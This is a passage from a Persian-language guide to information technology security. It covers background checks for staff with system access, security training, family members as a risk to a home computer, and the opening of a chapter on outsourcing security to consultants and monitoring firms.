ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪﺍﻱ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜ ﹺ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺳﻮﺍﺑﻖ ﻛﺎﺭﻱ ﺁﻧﻬﺎ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ
ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
•
•
•
•
•
•
•
ﻣﺘﺼﺪﻳﺎﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ؛
ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ﻣﻮﻗﺖ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺳﺘﺮﺳـﻲ
ﺩﺍﺭﻧﺪ؛
ﭘﺮﺳﻨﻞ ﺗﻌﻤﻴﺮﺍﺕ ﻭ ﻧﻈﺎﻓﺖ؛
ﻧﮕﻬﺒﺎﻧﺎﻥ ﺍﻣﻨﻴﺘﻲ؛
ﻧﺎﻣﻪﺭﺳﺎﻧﻬﺎ ﻭ ﭘﺮﺳﻨﻞ ﺑﺨﺶ ﺗﺪﺍﺭﻛﺎﺕ ﻛﻪ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎ
ﺩﺳﺘﺮﺳﻲ ﻣﻌﻤﻮﻟﻲ ﻳﺎ ﺑﺪﻭﻥ ﻧﻈﺎﺭﺕ ﺩﺍﺭﻧﺪ؛
ﻣﺸﺎﻭﺭﺍﻥ؛
ﺣﺴﺎﺑﺮﺳﺎﻥ ،ﻣﻤﻴﺰﻫﺎ ،ﻭ ﺳﺎﻳﺮ ﭘﺮﺳﻨﻞ ﺑﺨﺶ ﻣﺎﻟﻲ.
ﺗﻤﺎﻣﻲ ﻛﺎﺭﻛﻨﺎﻧﻲ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧـﺪ ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ
ﺍﻣﻨﻴﺖ ﻭ ﭘﻴـﺸﮕﻴﺮﻱ ﺍﺯ ﺧـﺴﺎﺭﺗﻬﺎ ﺁﻣﻮﺯﺷـﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﺑﺒﻴﻨﻨـﺪ ﻭ
ﻣﻄﺎﻟﺐ ﺁﻣﻮﺯﺷﻲ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﺮﺍﻳﺸﺎﻥ ﺗﻜﺮﺍﺭ ﺷﻮﺩ .ﭘﺮﺳـﻨﻞ
ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﺩﺭ ﺟﺮﻳﺎﻥ ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎ ﻭ ﻧﻴـﺰ
ﺟﺮﻳﻤﻪﻫﺎﻱ ﻧﻘﺾ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺍﺯ ﺟﺎﻧﺐ ﺧﺎﻧﻮﺍﺩﺓ ﺧﻮﺩﺗﺎﻥ ﻣﺘﻮﺟﻪ ﺷﻤﺎ ﺍﺳـﺖ ﺭﺍ ﺍﺯ
ﻳﺎﺩ ﻧﺒﺮﻳﺪ .ﺧﻮﺍﻩ ﺩﺭ ﻣﻨﺰﻝ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣـﺸﺘﺮﻙ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ
ﺍﻋﻀﺎﻱ ﺧﺎﻧﻮﺍﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﺧﻮﺍﻩ ﻛﻮﺩﻛﺎﻧﺘﺎﻥ ﺭﺍ ﮔﻬﮕﺎﻩ ﺑﺮﺍﻱ
ﺑﺎﺯﺩﻳﺪ ﺑﻪ ﺍﺩﺍﺭﻩ ﺑﺒﺮﻳﺪ ،ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳـﺖ ﻛـﻪ ﺁﻧﻬـﺎ
ﺑﺪﺍﻧﻨﺪ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭﺳﻴﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺑﺎﺯﻱ
ﻧﻴﺴﺖ .ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﻳﺎﺩ ﺑﮕﻴﺮﻧﺪ ﻛﻪ ﺑﻪ ﺩﺳﺘﮕﺎﻫﻬﺎ ﻭ ﻭﺳﺎﻳﻞ ﺣﺴﺎﺱ
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
١٦٥
ﺗﺠﺎﺭﻱ ﺩﺳﺖ ﻧﺰﻧﻨﺪ .ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺤﺎﻓﻈﻬـﺎﻱ
ﻧﻤﺎﻳﺸﮕﺮ ﻣﺠﻬﺰ ﺑﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ،ﺍﻗـﺪﺍﻡ ﭘﻴـﺸﮕﻴﺮﺍﻧﺔ ﻣﻨﺎﺳـﺒﻲ
ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ .ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺑـﻪ ﺍﻋـﻀﺎﻱ ﺧـﺎﻧﻮﺍﺩﺓ ﺧـﻮﺩ
ﺑﻴﺎﻣﻮﺯﻳﺪ ﻛﻪ ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ ﻣﺤـﻴﻂ ﻛـﺎﺭ ﻭ ﺗﺠـﺎﺭﺕ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﻤﺎ ﺑﺎ ﻛﺴﻲ ﺻﺤﺒﺖ ﻛﻨﻨﺪ.
ﺑﺨﺶ ﺳﻮﻡ
١٦٧
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﻬﺎﺭﺗﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺁﻧﻬﺎ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
ﻓﺼﻞ ﻫﻔﺘﻢ
١٠٠
ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴﺖ
ﻛﻠﻴﺎﺕ
ﺑﺮﻭﻧﺴﭙﺎﺭﻱ؛ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺑﺮﺍﻱ
ﻭﺭﻭﺩ ﻧﺎﺧﻮﺍﺳﺘﺔ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﻋﺮﺻﻪﻫﺎﻱ ﺟﺪﻳﺪ
ﺑﻌﺪ ﺍﺯ ﻣﻄﺎﻟﻌﺔ ﻫﻤﺔ ﻣﻄﺎﻟـﺐ ﻓـﺼﻠﻬﺎﻱ ﮔﺬﺷـﺘﻪ ﺷـﺎﻳﺪ ﺑـﻪ ﺍﻳـﻦ
ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬـﺎ ﺩﺭ ﻭﺿـﻌﻴﺖ
ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ؛ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﻨﻮﺯ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ
ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ؛ ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺣﺠﻢ ﻛﻞ ﻛـﺎﺭ ﺗﺮﺳـﻴﺪﻩ ﺑﺎﺷـﻴﺪ.
ﺍﮔﺮ ﺟﺰﺀ ﺩﺳﺘﻪ ﺁﺧﺮ ﻫﺴﺘﻴﺪ ﺍﻳﻦ ﺗﺼﻮﺭ ﺭﺍ ﻧﻜﻨﻴﺪ ﻛﻪ ﺍﻧﺠـﺎﻡﺷـﺪﻥ
ﺁﻥ ﻓﻌﺎﻟﻴﺖ ﺑﺮﺍﻱ ﺷﺮﻛﺖ ﺷـﻤﺎ ﺍﻣﻜـﺎﻥﻧﺎﭘـﺬﻳﺮ ﺍﺳـﺖ .ﺭﺍﻫﻬـﺎﻱ
ﺩﻳﮕﺮﻱ ﻫﻢ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬﺎ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺩﺭ
ﺍﺩﺍﺭﺓ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ :ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ،ﻣﺸﺎﻭﺭﺍﻥ ﻭ ﭘﻴﻤﺎﻧﻜـﺎﺭﺍﻥ
ﺧﺎﺭﺝ ﺍﺯ ﺷﺮﻛﺖ .ﺣﺘﻲ ﺍﮔﺮ ﺷﻤﺎ ﻳﻚ ﺗﺠﺎﺭﺕ ﺍﻧﻔـﺮﺍﺩﻱ ﻛﻮﭼـﻚ
ﺩﺭ ﻣﻨﺰﻝ ﻳﺎ ﺷﺮﻛﺘﻲ ﻛﻮﭼﻚ ﻛﻪ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻣﻨﺎﻓﻊ ﺗﻘﺴﻴﻢ ﺗﺠـﺎﺭﺏ
ﺗﺨﺼﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ :ﻋﻘﺪ ﻗـﺮﺍﺭﺩﺍﺩ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﺁﻧﺪﺳـﺘﻪ ﺍﺯ
ﺷﺮﻛﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻳـﻚ ﮔـﺮﻭﻩ ﺁﻣـﻮﺯﺵﺩﻳـﺪﻩ ﻭ
ﺑﺎﺗﺠﺮﺑﻪ ﻛﻪ ﺑﻪ ﻫﻴﭻ ﺍﺩﺍﺭﻩﺍﻱ ﻭﺍﺑﺴﺘﻪ ﻧﻴﺴﺘﻨﺪ ﺭﺍ ﺍﺳﺘﺨﺪﺍﻡ ﻛﻨﻨـﺪ ﻭ
ﺗﻮﺍﻧﺎﻳﻴﻬﺎﻳــﺸﺎﻥ ﺭﺍ ﺑــﺎ ﻣــﺸﺘﺮﻳﺎﻥ ﻣﺘﻘﺎﺿــﻲ ﺗﻘــﺴﻴﻢ ﻧﻤﺎﻳﻨــﺪ ﻭ
۱۰۰ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ )(Outsourcing
ﺍﮔﺮ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﺑﺨـﺸﻲ ﻣﺨـﺼﻮﺹ ﺗﻬﻴـﺔ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﺪﺍﺭﺩ ﻫﻨﻮﺯ ﻧﺘﻮﺍﻧﺴﺘﻪﺍﻳﺪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬﺎﻱ
ﺗﺮﻣﻴﻢ ﺍﺯ ﺳﻮﺍﻧﺢ ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺗـﺪﻭﻳﻦ ﻛﻨﻴـﺪ،
ﺗﻮﺻﻴﺔ ﻣﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺧـﺎﺭﺝ ﺳـﺎﺯﻣﺎﻧﻲ
ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ .ﭼﻨﺪ ﺳﺎﺯﻣﺎﻥ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﻪ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ ﺯﻣﻴﻨـﻪﻫـﺎﻱ ﻣـﺮﺗﺒﻂ ﺑـﺎ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ .ﺍﮔـﺮ ﭼﻨـﻴﻦ ﺗﺨﺼـﺼﻲ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﺑﺎﺷﺪ ،ﻣﻲﺗﻮﺍﻧﺪ ﻫﻢ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻛﻮﺗـﺎﻩﻣـﺪﺕ ﻭ ﻫـﻢ ﺑـﺮﺍﻱ
ﭘﻲﺭﻳﺰﻱ ﺗﻮﺍﻧﻤﻨﺪﻳﻬﺎﻱ ﺑﻠﻨﺪﻣﺪﺕﺗﺮ )ﺁﻣﻮﺯﺵ ﻭ ﻛﺴﺐ ﺁﮔﺎﻫﻲ( ﺑـﺴﻴﺎﺭ
ﺍﺭﺯﺷﻤﻨﺪ ﺑﺎﺷﺪ.
ﺗﺪﻭﻳﻦ ﻃﺮﺡ ﺍﺟﺮﺍﻳﻲ
ﺍﻭﻟﻴﻦ ﻗﺪﻡ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﺑﺎﻳـﺪ ﺍﺯ ﭼـﻪ ﺧـﺪﻣﺎﺗﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ:
۱۰۱ﻳﻜﻲ ﺍﺯ ﻧﺘﺎﻳﺞ ﻛﻤﺒﻮﺩ ﻣﺘﺨﺼﺺ ﺁﻣﻮﺯﺵﺩﻳﺪﺓ ﺍﻣﻨﻴﺖ ،ﻛﻤﺒﻮﺩ ﻛﺎﺭﻛﻨﺎﻥ ﻭ
ﻣﻨﺎﺑﻊ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺗﺤـﺼﻴﻼﺕ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻣﺮﺍﻛـﺰ ﺁﻣﻮﺯﺷـﻲ ﻭ
ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﺍﺳﺖ .ﺩﻭﻟﺘﻬﺎ ﻭ ﺻﻨﺎﻳﻊ ﺍﺩﻋـﺎ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺍﻳـﻦ ﺣـﻮﺯﻩ ﺍﺯ
ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ،ﺍﻣﺎ ﺩﺭ ﺗﺨﺼﻴﺺ ﻣﻨﺎﺑﻌﻲ ﺑـﺮﺍﻱ ﻛﻤـﻚ
ﺑﻪ ﺳﺎﺧﺘﻪﺷﺪﻥ ﺍﻳﻦ ﺣﻮﺯﻩ ﺑﻪ ﺷﺪﺕ ﺷﻜﺴﺖ ﺧﻮﺭﺩﻩﺍﻧﺪ.
ﺑﺨﺶ ﺳﻮﻡ
ﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺑﻴﺮﻭﻧﻲ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ ﺑﻨﮕﺎﻫﻬـﺎﻱ ﺍﻗﺘـﺼﺎﺩ ﹺ
ﻋﻤﻮﻣﻲ ،ﺧﺼﻮﺻﻲ ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻛﻪ ﻧﮕﺮﺍﻥ ﺗﻮﺍﻧﻤﻨﺪﻱ ﻭﺍﻛـﻨﺶ
ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺑﻪ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻫـﺴﺘﻨﺪ ﮔﺰﻳﻨـﺔ ﻣﻨﺎﺳـﺒﻲ
ﺍﺳﺖ ،ﻭﻟﻲ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺘﻲ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ ﺑﺎﻳـﺪ ﺑـﻪ
ﺩﻗﺖ ﺻﻮﺭﺕ ﮔﻴﺮﺩ ﻭ ﻛﺎﺭﺁﻳﻲ ﺁﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﻛﻨﺘﺮﻝ
ﺷﻮﺩ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺧﻲ ﺍﺯ ﻣﺰﺍﻳﺎ ﻭ ﻣﻌﺎﻳﺐ ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴـﺖ
ﺫﻛﺮ ﺷﺪﻩ ﻭ ﻳﻚ ﺩﺳـﺘﻪ ﺳـﺆﺍﻻﺕ ﻛـﻪ ﭘـﻴﺶ ﺍﺯ ﻧﻬـﺎﻳﻲ ﻛـﺮﺩﻥ
ﻣﺬﺍﻛﺮﺍﺕ ﺑﺎ ﺷﺮﻛﺎﻱ ﺟﺪﻳﺪ ﺑﺨﺶ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﺳـﺦ ﺩﺍﺩ
ﻧﻴﺰ ﻋﻨﻮﺍﻥ ﺷﺪﻩﺍﻧﺪ.
ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﮔﺮ ﺷﻤﺎ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺑﺎﻻﻳﻲ ﺩﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺷﺮﻛﺘﻲ ﺗﺄﺳﻴﺲ ﻛﻨﻴﺪ ﻭ ﺗﻮﺍﻧﺎﺋﻴﻬﺎﻱ ﺧﻮﺩ
ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺴﺎﻧﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ ﺑﻪ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ .ﺩﺭ
ﺍﻳﻦ ﻗﺒﻴﻞ ﺷﺮﻛﺘﻬﺎ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎﻱ ﺷـﻐﻠﻲ ﻣﻬﻤـﻲ ﭘﻴـﺪﺍ ﻣـﻲﺷـﻮﺩ؛
ﭼﺮﺍﻛﻪ ﺩﺭ ﺳﻄﺢ ﺩﻧﻴﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ
ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺘﻮﺍﻧـﺪ ﺟﻮﺍﺑﮕـﻮﻱ ﺗﻤـﺎﻣﻲ ﻧﻴﺎﺯﻫـﺎﻱ ﺻـﻨﺎﻳﻊ ﻭ
ﺩﻭﻟﺘﻬﺎ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑﺎﺷﺪ .١٠١ﻟﺬﺍ ﺩﺭ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻏﺮﺏ ،ﻳﻚ ﺍﻧﻔﺠﺎﺭ ﺩﺭ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﺧـﺪﻣﺎﺕ
ﻣـﺸﺎﻭﺭﺍﻥ ﻭ ﻣﻨــﺎﺑﻊ ﺧـﺎﺭﺟﻲ ﺑــﺮﺍﻱ ﻛﻤــﻚ ﺑـﻪ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﺑــﺎ
ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﻣﺸﺎﺑﻪ ﺣﺎﻟﺘﻲ ﻛﻪ ﺑﺮﺍﻱ
ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﺧـﺪﻣﺎﺕ ﻗﺎﺑـﻞ ﻭﺍﮔـﺬﺍﺭﻱ ﺑـﻪ ﻣﻨـﺎﺑﻊ ﺧـﺎﺭﺝ ﺍﺯ
ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﺑﺮﺧـﻲ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ ﺩﺭﺟـﻪﻳـﻚ ﻭ
ﻣﻤﺘﺎﺯ ﻫﺴﺘﻨﺪ ،ﺑﺮﺧﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻛـﺎﺭ ﺧـﻮﺩ ﺍﺯ ﺗﺨـﺼﺺ ﺑـﺎﻻﻳﻲ
ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ،ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﺿﻌﻴﻒ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ .ﻣﺘﺄﺳـﻔﺎﻧﻪ
ﻭﺿﻌﻴﺖ ﺍﻳﻦ ﺷﺎﺧﻪ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺑـﺎ ﻳـﻚ ﻧﮕـﺎﻩ
ﺿﻌﻒ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺗـﺎﺯﻩﻛـﺎﺭ ﺗﻬﻴـﻪ ﺷـﺪﻩﺍﻧـﺪ ﺭﺍ
ﺗﺸﺨﻴﺺ ﺩﺍﺩ.
١٦٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺁﻳــﺎ ﺑﺨــﺶ ﺍﻣﻨﻴــﺖ ﺭﺍ ﺑﻌﻨــﻮﺍﻥ ﺑﺨــﺸﻲ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ ﺧــﻮﺩ ﻭ ﺑــﺎ
ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧﻮﺩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﻛﻨﻴﺪ؟
ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﺎﺷﺪ ﺷﺎﻳﺪ ﻓﻘﻂ ﺑﻪ ﻣﺸﺎﻭﺭﺍﻧﻲ ﻧﻴﺎﺯ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ
ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻓﺮﺍﻣﻮﺵ ﻧﺸﺪﻥ ﻳﻚ ﻣـﺴﺌﻠﻪ ﻣﻬـﻢ ،ﻋﻤﻠﻴـﺎﺕ
ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ.
ﺷﺎﻳﺪ ﺧﻮﺩﺗﺎﻥ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻛﺎﺭﺷﻨﺎﺳﺎﻧﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭﻟﻲ ﻧﮕﺮﺍﻥ
ﺯﻣﺎﻥ ﻛﻢ ﻳﺎ ﺗﻮﺍﻧﺎﻳﻲ ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳﺐ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﺑﺤﺮﺍﻥ ﺑﺎﺷﻴﺪ.
ﻱ ﻳﻚ ﺷﺮﻛﺖ ﺑﻪ ﺑﺎﺯﺍﺭ ﺑﺮﻭﻳـﺪ
ﭘﺲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺟﻠﺐ ﻫﻤﻜﺎﺭ ﹺ
ﺗﺎ ﭼﻨﺪ ﭘﻴﻤﺎﻧﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ )ﺗﻤﺎﻡ ﻭﻗﺖ ﻭ ﻳﺎ ﭘـﺎﺭﻩ ﻭﻗـﺖ( ﺑـﻪ
ﺍﺩﺍﺭﺓ ﺷﻤﺎ ﺑﻔﺮﺳﺘﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴـﺪ ﺍﺯ ﺧـﺪﻣﺎﺕ
ﺷﺮﻛﺘﻬﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﻭﺍﻛﻨﺶ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ١٠٢ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺗﻨﻬـﺎ
ﺑﺮ ﺍﻣﻨﻴﺖ ﺷﻤﺎ ﻧﻈﺎﺭﺕ ﻛﻨﻨﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﺑﺮﻭﺯ ﺍﺷـﻜﺎﻝ ﺑـﻪ ﺷـﻤﺎ
ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ.
ﺷﺎﻳﺪ ﻧﺘﻮﺍﻧﻴﺪ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺗﻤﺎﻡ ﻭﻗﺖ ﺑﻜﺎﺭ ﺑﮕﻴﺮﻳﺪ ﻳـﺎ ﻧﻴـﺎﺯﻱ ﺑـﻪ
ﭼﻨﻴﻦ ﻛﺴﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ .ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻋﻘـﺪ
ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎ ﻳﻚ ﺷﺮﻛﺖ ﻣـﺸﺎﻭﺭﻩ ﻭ ﻧﻈـﺎﺭﺕ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ
ﺧﺪﻣﺎﺕ ﻛﺎﻣﻞ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻧﻴﺎﺯﺗﺎﻥ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﻛﻨﺪ ﻭ ﻧﻴﺰ ﻣﻘﺮﻭﻥ
ﺑﻪ ﺻﺮﻓﻪﺗﺮ ﺑﺎﺷﺪ.
